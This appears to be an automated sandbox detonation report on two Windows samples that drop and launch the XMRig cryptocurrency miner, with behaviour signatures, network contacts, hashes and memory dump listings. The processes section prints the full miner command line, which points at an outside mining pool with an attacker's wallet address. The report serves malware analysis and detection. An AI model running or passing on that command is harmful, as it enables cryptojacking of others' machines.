| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3396 wrote to memory of 3440 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3396 wrote to memory of 3440 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.141.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3440-16-0x000002396ABA0000-0x000002396ABC0000-memory.dmp
memory/3440-17-0x000002396C4A0000-0x000002396C4C0000-memory.dmp
memory/3440-18-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-20-0x000002396C4E0000-0x000002396C500000-memory.dmp
memory/3440-19-0x000002396C4C0000-0x000002396C4E0000-memory.dmp
memory/3440-21-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-22-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-25-0x000002396C4E0000-0x000002396C500000-memory.dmp
memory/3440-24-0x000002396C4C0000-0x000002396C4E0000-memory.dmp
memory/3440-23-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-26-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-27-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-28-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-29-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-30-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-31-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-32-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-33-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-34-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-35-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-36-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-37-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-38-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-39-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-40-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-41-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-42-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-43-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-44-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-45-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-46-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-47-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-48-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-49-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-50-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-51-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-52-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-53-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-54-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-55-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-56-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-57-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-58-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-59-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-60-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-61-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-62-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-63-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-64-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-65-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-66-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-67-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-68-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-69-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-70-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-71-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-72-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-73-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-74-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-75-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-76-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-77-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-78-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-79-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-80-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-81-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-82-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-83-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-84-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:41
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3660 wrote to memory of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3660 wrote to memory of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4008-16-0x000001ADDE2E0000-0x000001ADDE300000-memory.dmp
memory/4008-17-0x000001ADDE330000-0x000001ADDE350000-memory.dmp
memory/4008-18-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-19-0x000001ADDE370000-0x000001ADDE390000-memory.dmp
memory/4008-20-0x000001ADDE350000-0x000001ADDE370000-memory.dmp
memory/4008-21-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-22-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-23-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-25-0x000001ADDE350000-0x000001ADDE370000-memory.dmp
memory/4008-24-0x000001ADDE370000-0x000001ADDE390000-memory.dmp
memory/4008-26-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-27-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-28-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-29-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-30-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-31-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-32-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-33-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-34-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-35-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-36-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-37-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-38-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-39-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-40-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-41-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-42-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-43-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-44-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-45-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-46-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-47-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-48-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-49-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-50-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-51-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-52-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-53-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-54-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-55-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-56-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-57-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-58-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-59-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-60-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-61-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-62-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-63-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-64-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-65-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-66-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-67-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-68-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-69-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-70-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-71-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-72-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-73-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-74-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-75-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-76-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-77-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-78-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-79-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-80-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-81-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-82-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-83-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-84-0x00007FF71D560000-0x00007FF71E063000-memory.dmp